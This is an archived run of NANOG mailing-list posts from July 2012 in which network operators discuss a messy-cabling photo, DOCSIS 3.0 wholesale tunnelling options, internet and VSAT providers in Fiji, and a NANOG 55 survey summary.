network.ipdog at gmail.com (Network IPdog) Date: Tue, 31 Jul 2012 14:04:24 -0700 Subject: You thought you had... wiring issues!!! Message-ID: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Mates. WiringIssues.jpg Ephesians 4:32 & Cheers!!! A password is like a... toothbrush ;^) Choose a good one, change it regularly and don't share it. -------------- next part -------------- A non-text attachment was scrubbed... Name: image001.jpg Type: image/jpeg Size: 46417 bytes Desc: not available URL: From lyle at lcrcomputer.net Tue Jul 31 16:07:23 2012 From: lyle at lcrcomputer.net (Lyle Giese) Date: Tue, 31 Jul 2012 16:07:23 -0500 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: <5018490B.8000702@lcrcomputer.net> On 07/31/12 16:04, Network IPdog wrote: > Mates. > > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > > good one! One question, what are those big cables with the big boot on them? From sadiq at asininetech.com Tue Jul 31 16:13:07 2012 From: sadiq at asininetech.com (Sadiq Saif) Date: Tue, 31 Jul 2012 17:13:07 -0400 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: For the opposite check - http://www.reddit.com/r/cableporn (completely SFW of course ;)) On Tue, Jul 31, 2012 at 5:04 PM, Network IPdog wrote: > Mates. > > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > -- Sadiq S O< ascii ribbon campaign - stop html mail - www.asciiribbon.org From network.ipdog at gmail.com Tue Jul 31 16:24:13 2012 From: network.ipdog at gmail.com (Network IPdog) Date: Tue, 31 Jul 2012 14:24:13 -0700 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018490B.8000702@lcrcomputer.net> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> <5018490B.8000702@lcrcomputer.net> Message-ID: <50184d01.c7de440a.3e5a.622f@mx.google.com> They are HD Video Cables with baluns for hum suppression. Ephesians 4:32 & Cheers!!! A password is like a... toothbrush ;^) Choose a good one, change it regularly and don't share it. -----Original Message----- From: Lyle Giese [mailto:lyle at lcrcomputer.net] Sent: Tuesday, July 31, 2012 2:07 PM To: nanog at nanog.org Subject: Re: You thought you had... wiring issues!!! On 07/31/12 16:04, Network IPdog wrote: > Mates. > > > > WiringIssues.jpg > > > > > > Ephesians 4:32 & Cheers!!! > > > > A password is like a... toothbrush ;^) > > Choose a good one, change it regularly and don't share it. > > > > good one! One question, what are those big cables with the big boot on them? From jra at baylink.com Tue Jul 31 16:26:53 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 31 Jul 2012 17:26:53 -0400 (EDT) Subject: You thought you had... wiring issues!!! In-Reply-To: <5018485c.27f1440a.26f6.5e5d@mx.google.com> Message-ID: <23464683.17258.1343770013281.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Network IPdog" [ sloppy-cable-porn pic attached ] No! Noooooooo! It's only Tuesday; you can't start the Whacky Weekend thread this early! Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA #natog +1 727 647 1274 From nat at nuqe.net Tue Jul 31 16:56:34 2012 From: nat at nuqe.net (Nat Morris) Date: Tue, 31 Jul 2012 22:56:34 +0100 Subject: You thought you had... wiring issues!!! In-Reply-To: <5018490B.8000702@lcrcomputer.net> References: <5018485c.27f1440a.26f6.5e5d@mx.google.com> <5018490B.8000702@lcrcomputer.net> Message-ID: On 31 July 2012 22:07, Lyle Giese wrote: > good one! One question, what are those big cables with the big boot on > them? Its the back of an outside broadcast truck, the cables are triax - http://en.wikipedia.org/wiki/Triaxial_cable Boots are just used to protect the triax connector from damp when either hooked up to the back of a camera or an outside patch bay - http://www.steadicam-facilities.co.uk/images/equipment-triaxcameracable-163.jpeg -- Nat http://natmorris.co.uk http://twitter.com/natmorris From iptech at northrock.bm Tue Jul 31 17:13:41 2012 From: iptech at northrock.bm (iptech) Date: Tue, 31 Jul 2012 19:13:41 -0300 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: <50185895.4040203@northrock.bm> Hey Ricky, Yes that is the exact setup, the cableco bring the customer to us via L2TP, and now want to do PPTP only. I will keep digging on the ARRIS, which I have been told is a C4 system. Although their website doesnt show much tech specs. They are pushing for the L3 option since their CMTS will now be a hop in the path between the customer and us, instead of L2 transparent. Suggestions? Thanks, On 7/31/2012 5:19 PM, Ricky Beam wrote: > On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: >> 3.0 compliant setup, and this standard no longer supports PPPoE via >> L2TP, and can now only offer PPTP for terminating with us. > > As I recall from my reading of "the standard", there's nothing in > there to prevent any tunneling on top of the DOCSIS bridged ethernet. > > I suspect this is not a "standard" problem but an ISP problem... their > new hardware doesn't support PPPoE/L2TP, it's an additional license, > or they don't know how (or unwilling) to configure it. > > (I'm assuming the PPPoE is between you and the customer, and L2TP is > between your network and the cable network. i.e. L2TP is how your > customers are brought to you from the cable network.) > > I have no documentation on ARRIS either, so I don't know what they > can/cannot do. > From kyle.creyts at gmail.com Tue Jul 31 18:43:51 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Tue, 31 Jul 2012 16:43:51 -0700 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50185895.4040203@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> <50185895.4040203@northrock.bm> Message-ID: to elaborate on Valdis' reply, stick a fork in pptp, it is done. https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ On Tue, Jul 31, 2012 at 3:13 PM, iptech wrote: > Hey Ricky, > > Yes that is the exact setup, the cableco bring the customer to us via L2TP, > and now want to do PPTP only. > > I will keep digging on the ARRIS, which I have been told is a C4 system. > Although their website doesnt show much tech specs. > > They are pushing for the L3 option since their CMTS will now be a hop in the > path between the customer and us, instead of L2 transparent. > > Suggestions? > > Thanks, > > > On 7/31/2012 5:19 PM, Ricky Beam wrote: >> >> On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: >>> >>> 3.0 compliant setup, and this standard no longer supports PPPoE via L2TP, >>> and can now only offer PPTP for terminating with us. >> >> >> As I recall from my reading of "the standard", there's nothing in there to >> prevent any tunneling on top of the DOCSIS bridged ethernet. >> >> I suspect this is not a "standard" problem but an ISP problem... their new >> hardware doesn't support PPPoE/L2TP, it's an additional license, or they >> don't know how (or unwilling) to configure it. >> >> (I'm assuming the PPPoE is between you and the customer, and L2TP is >> between your network and the cable network. i.e. L2TP is how your customers >> are brought to you from the cable network.) >> >> I have no documentation on ARRIS either, so I don't know what they >> can/cannot do. >> > > -- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer From fmartin at linkedin.com Tue Jul 31 18:55:28 2012 From: fmartin at linkedin.com (Franck Martin) Date: Tue, 31 Jul 2012 23:55:28 +0000 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: In no particular order Connect.com.fj aka tfl.com.fj Fintel.com.fj Vodafone.com.fj (via a 3G stick) Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) If you want to do BGP or IPv6, good luck! Is that for Fiji Water? ;) These people have very good operational Internet experience in Fiji. http://www.linkedin.com/in/timothyverma http://www.linkedin.com/pub/alfred-prasad/0/409/14a http://au.linkedin.com/in/skeeve On 7/31/12 1:14 PM, "Philip Lavine" wrote: >Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? From michael at bowe.id.au Tue Jul 31 19:03:44 2012 From: michael at bowe.id.au (Michael Bowe) Date: Wed, 1 Aug 2012 10:03:44 +1000 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50185895.4040203@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> <50185895.4040203@northrock.bm> Message-ID: <002c01cd6f79$1eb00330$5c100990$@id.au> Hi iptech As others have said, early Cisco CMTS could do full bridging and/or PPPoE termination, but newer gear is typically L3 style only. For wholesale, the cableco could do one of these : * L2 solution : Change your customers to configured as DOCSIS BSoD L2VPN, and deliver you one dot1q VLAN per customer. You can continue to use PPPoE with this config (sessions landing directly on your LNS). Gotcha: don't know about Arris, but Cisco caps you at 4K VLANs per chassis which means this solution doesn't scale all that well. * L2 solution : Change your customers to be setup as DOCSIS BSoD L2VPN, and deliver you one MPLS pseudowire per customer. You can continue to use PPPoE with this config (sessions landing directly on your LNS). Gotcha: don't know about Arris, but Cisco caps you at 16K pw per chassis which means this solution only provides moderate scaling. Also you have to somehow terminate all these pw (which are "xconnect"s in Cisco-speak). * L3 soution : change your customers to land on a dedicated bundle and VRF. Apply policy based routing to force-forward all the CPE traffic up a VLAN to you. If you want to be able to authenticate/count/shape then you probably need to terminate this traffic as IPoE (Use a dedicated BNG, or maybe you could try Cisco ISG). Cableco would provide the DHCP for the CM, you would provide the DHCP for the CPE. CMTS would insert CM MAC as option 82 so you know which CPE belongs to which CM/customer. * L3 solution : last option is to do what they proposed. I would probably still implement this with a dedicated bundle and VRF. But rather than having to land the sessions as IPoE, you can now have them come in as PPTP. This allows you to authenticate/count/shape via your LNS. Hope that helps, Michael. From eyeronic.design at gmail.com Tue Jul 31 19:39:19 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Tue, 31 Jul 2012 17:39:19 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: It looks like Fintel and TFL are both providers for Southern Cross cable. That would be your best bet if they can get lines out to you. Otherwise, there's always VSAT, but that brings a set of other issues with it. Ping me offlist if you want more detail on the VSAT stuff. On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: > In no particular order > > Connect.com.fj aka tfl.com.fj > Fintel.com.fj > Vodafone.com.fj (via a 3G stick) > Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) > > If you want to do BGP or IPv6, good luck! > > Is that for Fiji Water? ;) > > These people have very good operational Internet experience in Fiji. > > http://www.linkedin.com/in/timothyverma > http://www.linkedin.com/pub/alfred-prasad/0/409/14a > http://au.linkedin.com/in/skeeve > > On 7/31/12 1:14 PM, "Philip Lavine" wrote: > >>Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? > > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From zaid at zaidali.com Tue Jul 31 19:58:18 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 17:58:18 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. Zaid On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: > It looks like Fintel and TFL are both providers for Southern Cross > cable. That would be your best bet if they can get lines out to you. > > Otherwise, there's always VSAT, but that brings a set of other issues with it. > > Ping me offlist if you want more detail on the VSAT stuff. > > On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >> In no particular order >> >> Connect.com.fj aka tfl.com.fj >> Fintel.com.fj >> Vodafone.com.fj (via a 3G stick) >> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >> >> If you want to do BGP or IPv6, good luck! >> >> Is that for Fiji Water? ;) >> >> These people have very good operational Internet experience in Fiji. >> >> http://www.linkedin.com/in/timothyverma >> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >> http://au.linkedin.com/in/skeeve >> >> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >> >>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >> >> > > > > -- > 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 > From eyeronic.design at gmail.com Tue Jul 31 20:05:17 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Tue, 31 Jul 2012 18:05:17 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: VSAT *isn't* a waste of time if you're willing to spend the money. But that, of course, is the key point. Quality VSAT service costs a LOT of money (3k-5k per asymetrical megabit). Plus, a quality provider will have no problem providing you with BGP. On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: > Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. > > Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. > > Zaid > > On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: > >> It looks like Fintel and TFL are both providers for Southern Cross >> cable. That would be your best bet if they can get lines out to you. >> >> Otherwise, there's always VSAT, but that brings a set of other issues with it. >> >> Ping me offlist if you want more detail on the VSAT stuff. >> >> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >>> In no particular order >>> >>> Connect.com.fj aka tfl.com.fj >>> Fintel.com.fj >>> Vodafone.com.fj (via a 3G stick) >>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >>> >>> If you want to do BGP or IPv6, good luck! >>> >>> Is that for Fiji Water? ;) >>> >>> These people have very good operational Internet experience in Fiji. >>> >>> http://www.linkedin.com/in/timothyverma >>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>> http://au.linkedin.com/in/skeeve >>> >>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>> >>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>> >>> >> >> >> >> -- >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >> > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From fmartin at linkedin.com Tue Jul 31 20:34:36 2012 From: fmartin at linkedin.com (Franck Martin) Date: Wed, 1 Aug 2012 01:34:36 +0000 Subject: Fiji Islands In-Reply-To: Message-ID: And you need a license to operate VSAT in Fiji (as well as to operate an ISP), which is near impossible to get on the mainland, as TFL can provide you the service you require. For SCC, FINTEL and TFL have direct access to SCC. Tho last time I looked, TFL peering is not very good. FINTEL: http://bgp.he.net/AS9241 TFL: http://bgp.he.net/AS45349 And there is the University of the South Pacific which is not a provider of any Internet Service http://bgp.he.net/AS24390 The fun part of all of that, is that the interconnection of these 3 AS is done overseas? FAIL! On 7/31/12 6:05 PM, "Mike Hale" wrote: >VSAT *isn't* a waste of time if you're willing to spend the money. > >But that, of course, is the key point. Quality VSAT service costs a >LOT of money (3k-5k per asymetrical megabit). Plus, a quality >provider will have no problem providing you with BGP. > >On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: >> Fintel and TFL sleep in the same bed essentially. Fintel is the >>gatekeeper of the southern cross cable protected heavily by the local >>government, your typical monopoly setup. Connect is a business unit of >>TFL. I think you can do the math there. >> >> Fintel does not do BGP out of the country (or didn't the last time I >>was there). Forget VSAT, waste of time. >> >> Zaid >> >> On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: >> >>> It looks like Fintel and TFL are both providers for Southern Cross >>> cable. That would be your best bet if they can get lines out to you. >>> >>> Otherwise, there's always VSAT, but that brings a set of other issues >>>with it. >>> >>> Ping me offlist if you want more detail on the VSAT stuff. >>> >>> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin >>>wrote: >>>> In no particular order >>>> >>>> Connect.com.fj aka tfl.com.fj >>>> Fintel.com.fj >>>> Vodafone.com.fj (via a 3G stick) >>>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone >>>>network) >>>> >>>> If you want to do BGP or IPv6, good luck! >>>> >>>> Is that for Fiji Water? ;) >>>> >>>> These people have very good operational Internet experience in Fiji. >>>> >>>> http://www.linkedin.com/in/timothyverma >>>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>>> http://au.linkedin.com/in/skeeve >>>> >>>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>>> >>>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>>> >>>> >>> >>> >>> >>> -- >>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >>> >> > > > >-- >09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From zaid at zaidali.com Tue Jul 31 20:37:41 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 18:37:41 -0700 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com> VSAT is resold by Telecom Fiji so you are not going to get anything different than the Telecom Fiji experience with the added bonus of very few folks using VSAT in the country and Telecom FIji doing a poor job of operational support of VSAT. I considered VSAT 12 years ago for connecting the university medical network I built there but setting aside costs there was really no competence from Telecom Fiji to manage this service. If something breaks in the earth station a VSAT tech is flown from Australia and it can take weeks to fix anything. My suggestion is to work with Connect folks and explore redundancy from either vodafone or digicel as Franck suggested. My experience there has been building networks in Suva, Lautoka, Nadi. Skeeve can give more advise for all the fun building in the resort Islands :) Zaid On Jul 31, 2012, at 6:05 PM, Mike Hale wrote: > VSAT *isn't* a waste of time if you're willing to spend the money. > > But that, of course, is the key point. Quality VSAT service costs a > LOT of money (3k-5k per asymetrical megabit). Plus, a quality > provider will have no problem providing you with BGP. > > On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: >> Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. >> >> Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. >> >> Zaid >> >> On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: >> >>> It looks like Fintel and TFL are both providers for Southern Cross >>> cable. That would be your best bet if they can get lines out to you. >>> >>> Otherwise, there's always VSAT, but that brings a set of other issues with it. >>> >>> Ping me offlist if you want more detail on the VSAT stuff. >>> >>> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >>>> In no particular order >>>> >>>> Connect.com.fj aka tfl.com.fj >>>> Fintel.com.fj >>>> Vodafone.com.fj (via a 3G stick) >>>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >>>> >>>> If you want to do BGP or IPv6, good luck! >>>> >>>> Is that for Fiji Water? ;) >>>> >>>> These people have very good operational Internet experience in Fiji. >>>> >>>> http://www.linkedin.com/in/timothyverma >>>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>>> http://au.linkedin.com/in/skeeve >>>> >>>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>>> >>>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>>> >>>> >>> >>> >>> >>> -- >>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >>> >> > > > > -- > 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From eyeronic.design at gmail.com Tue Jul 31 20:58:20 2012 From: eyeronic.design at gmail.com (Mike Hale) Date: Tue, 31 Jul 2012 18:58:20 -0700 Subject: Fiji Islands In-Reply-To: <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com> References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com> Message-ID: Zaid, Franck: Thanks for the clarification. I forgot to take into account politics. I suppose it's impossible to obtain a VSAT license if you're transmitting to an out-of-country teleport? The technical support side isn't that difficult if you've got reasonable intelligent people onsite along with spares of *everything*. On Tue, Jul 31, 2012 at 6:37 PM, Zaid Ali wrote: > VSAT is resold by Telecom Fiji so you are not going to get anything different than the Telecom Fiji experience with the added bonus of very few folks using VSAT in the country and Telecom FIji doing a poor job of operational support of VSAT. I considered VSAT 12 years ago for connecting the university medical network I built there but setting aside costs there was really no competence from Telecom Fiji to manage this service. If something breaks in the earth station a VSAT tech is flown from Australia and it can take weeks to fix anything. > > My suggestion is to work with Connect folks and explore redundancy from either vodafone or digicel as Franck suggested. My experience there has been building networks in Suva, Lautoka, Nadi. Skeeve can give more advise for all the fun building in the resort Islands :) > > Zaid > > On Jul 31, 2012, at 6:05 PM, Mike Hale wrote: > >> VSAT *isn't* a waste of time if you're willing to spend the money. >> >> But that, of course, is the key point. Quality VSAT service costs a >> LOT of money (3k-5k per asymetrical megabit). Plus, a quality >> provider will have no problem providing you with BGP. >> >> On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: >>> Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. >>> >>> Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. >>> >>> Zaid >>> >>> On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: >>> >>>> It looks like Fintel and TFL are both providers for Southern Cross >>>> cable. That would be your best bet if they can get lines out to you. >>>> >>>> Otherwise, there's always VSAT, but that brings a set of other issues with it. >>>> >>>> Ping me offlist if you want more detail on the VSAT stuff. >>>> >>>> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >>>>> In no particular order >>>>> >>>>> Connect.com.fj aka tfl.com.fj >>>>> Fintel.com.fj >>>>> Vodafone.com.fj (via a 3G stick) >>>>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >>>>> >>>>> If you want to do BGP or IPv6, good luck! >>>>> >>>>> Is that for Fiji Water? ;) >>>>> >>>>> These people have very good operational Internet experience in Fiji. >>>>> >>>>> http://www.linkedin.com/in/timothyverma >>>>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>>>> http://au.linkedin.com/in/skeeve >>>>> >>>>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>>>> >>>>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>>>> >>>>> >>>> >>>> >>>> >>>> -- >>>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >>>> >>> >> >> >> >> -- >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 > -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 From sylvie at newnog.org Tue Jul 31 21:41:25 2012 From: sylvie at newnog.org (Sylvie LaPerriere) Date: Tue, 31 Jul 2012 22:41:25 -0400 Subject: [NANOG-announce] NANOG 55 Survey Highlights and Upcoming NANOG 56/ARIN XXX Message-ID: NANOG Colleagues, NANOG 55 Attendees, We hope you are having a great Summer. We are already hard at work preparing for NANOG 56/ARIN XXX in Dallas. Take a moment now to register for the conference and book your hotel room at http://www.nanog.org/meetings/nanog56/nanog56_registration.html We had 525 registrants in Vancouver last June and I want to share the surveys highlights. The survey participation rate was 14%. We are thankful for your answers as knowing your preferences increases the likelihood of planning future 'awesome' events for you. Highlights: * Your top 3 reasons to attend NANOG are 1) network with colleague 2) the agenda (program) quality and content 3) tutorials. Closely followed by 4) socials, 5) keynotes and 6) location. * You rated the quality of our speakers, the quality of the technical information presented and the technical relevance of topics as either 'excellent' or 'very good'. * You are generally not commenting about the NANOG conference on social media platforms during the event. * 78% of attendees were able to successfully associate to the wireless network on their first attempt * You thought the Westin was great for its location, its setting and its amenities (nice to know for future picks!) * You come to NANOG to meet new people, socially interact with colleagues and learn. * You generally are not a subscriber to our mailing lists: nanog@, nanog-announce@, nanog-futures@ First-Time attendees enjoyed their NANOG experience and are hopeful that they will be able to return to future meetings. Some are even planning to bring along colleagues. Comments for speakers were really appreciated. We shared with those presenting, thereby helping speakers with future presentations and communicating attendees' expectations with respect to presentation content and its delivery. The Food & Beverage (F&B) comments were great. You are generally very pleased with the quality and the variety. We note that your level of satisfaction increases if you are continuously caffeinated or hydrated during the day and if offered plenty of beer/wine/spirits/sodas during the evenings. We took good note of your suggestions and look for them at NANOG 56. Special thanks for embracing (ie not complaining) our 'green options' : favouring large dispensers over individual plastic bottles or cans saves us lots of money and reduces our environmental footprint. For the curious-minded, detailed results are posted at http://www.nanog.org/meetings/nanog55/surveys.html. Consider joining the mailing lists at http://www.nanog.org/mailinglist/ Thanks again to all who attended, presented, and sponsored our return trip to Canada with NANOG 55. It was a great experience and we will not wait another 5 years to return to Canada. We look forward to seeing everyone again at NANOG 56/ARIN XXX! Sincerely, Sylvie -- Sylvie LaPerriere NANOG Board Chair - www.nanog.org -------------- next part -------------- _______________________________________________ NANOG-announce mailing list NANOG-announce at nanog.org https://mailman.nanog.org/mailman/listinfo/nanog-announce From fmartin at linkedin.com Tue Jul 31 21:45:35 2012 From: fmartin at linkedin.com (Franck Martin) Date: Wed, 1 Aug 2012 02:45:35 +0000 Subject: Fiji Islands In-Reply-To: References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> <809547A0-4FD2-4CC3-9370-5F4E08B09003@zaidali.com>, Message-ID: <9BF90809-0B41-4FE0-8F7D-978F25834AB2@linkedin.com> It is not impossible but you have to prove the current providers cannot provide you the service. Some resorts in remote islands use VSAT. To be noted O3B could be a solution too. Toute connaissance est une r?ponse ? une question. On Jul 31, 2012, at 6:58 PM, "Mike Hale" wrote: > Zaid, Franck: Thanks for the clarification. I forgot to take into > account politics. > > I suppose it's impossible to obtain a VSAT license if you're > transmitting to an out-of-country teleport? > > The technical support side isn't that difficult if you've got > reasonable intelligent people onsite along with spares of > *everything*. > > On Tue, Jul 31, 2012 at 6:37 PM, Zaid Ali wrote: >> VSAT is resold by Telecom Fiji so you are not going to get anything different than the Telecom Fiji experience with the added bonus of very few folks using VSAT in the country and Telecom FIji doing a poor job of operational support of VSAT. I considered VSAT 12 years ago for connecting the university medical network I built there but setting aside costs there was really no competence from Telecom Fiji to manage this service. If something breaks in the earth station a VSAT tech is flown from Australia and it can take weeks to fix anything. >> >> My suggestion is to work with Connect folks and explore redundancy from either vodafone or digicel as Franck suggested. My experience there has been building networks in Suva, Lautoka, Nadi. Skeeve can give more advise for all the fun building in the resort Islands :) >> >> Zaid >> >> On Jul 31, 2012, at 6:05 PM, Mike Hale wrote: >> >>> VSAT *isn't* a waste of time if you're willing to spend the money. >>> >>> But that, of course, is the key point. Quality VSAT service costs a >>> LOT of money (3k-5k per asymetrical megabit). Plus, a quality >>> provider will have no problem providing you with BGP. >>> >>> On Tue, Jul 31, 2012 at 5:58 PM, Zaid Ali wrote: >>>> Fintel and TFL sleep in the same bed essentially. Fintel is the gatekeeper of the southern cross cable protected heavily by the local government, your typical monopoly setup. Connect is a business unit of TFL. I think you can do the math there. >>>> >>>> Fintel does not do BGP out of the country (or didn't the last time I was there). Forget VSAT, waste of time. >>>> >>>> Zaid >>>> >>>> On Jul 31, 2012, at 5:39 PM, Mike Hale wrote: >>>> >>>>> It looks like Fintel and TFL are both providers for Southern Cross >>>>> cable. That would be your best bet if they can get lines out to you. >>>>> >>>>> Otherwise, there's always VSAT, but that brings a set of other issues with it. >>>>> >>>>> Ping me offlist if you want more detail on the VSAT stuff. >>>>> >>>>> On Tue, Jul 31, 2012 at 4:55 PM, Franck Martin wrote: >>>>>> In no particular order >>>>>> >>>>>> Connect.com.fj aka tfl.com.fj >>>>>> Fintel.com.fj >>>>>> Vodafone.com.fj (via a 3G stick) >>>>>> Digicel.com.fj (via a 2G stick, but also via a wireless backbone network) >>>>>> >>>>>> If you want to do BGP or IPv6, good luck! >>>>>> >>>>>> Is that for Fiji Water? ;) >>>>>> >>>>>> These people have very good operational Internet experience in Fiji. >>>>>> >>>>>> http://www.linkedin.com/in/timothyverma >>>>>> http://www.linkedin.com/pub/alfred-prasad/0/409/14a >>>>>> http://au.linkedin.com/in/skeeve >>>>>> >>>>>> On 7/31/12 1:14 PM, "Philip Lavine" wrote: >>>>>> >>>>>>> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? >>>>>> >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >>>>> >>>> >>> >>> >>> >>> -- >>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 >> > > > > -- > 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0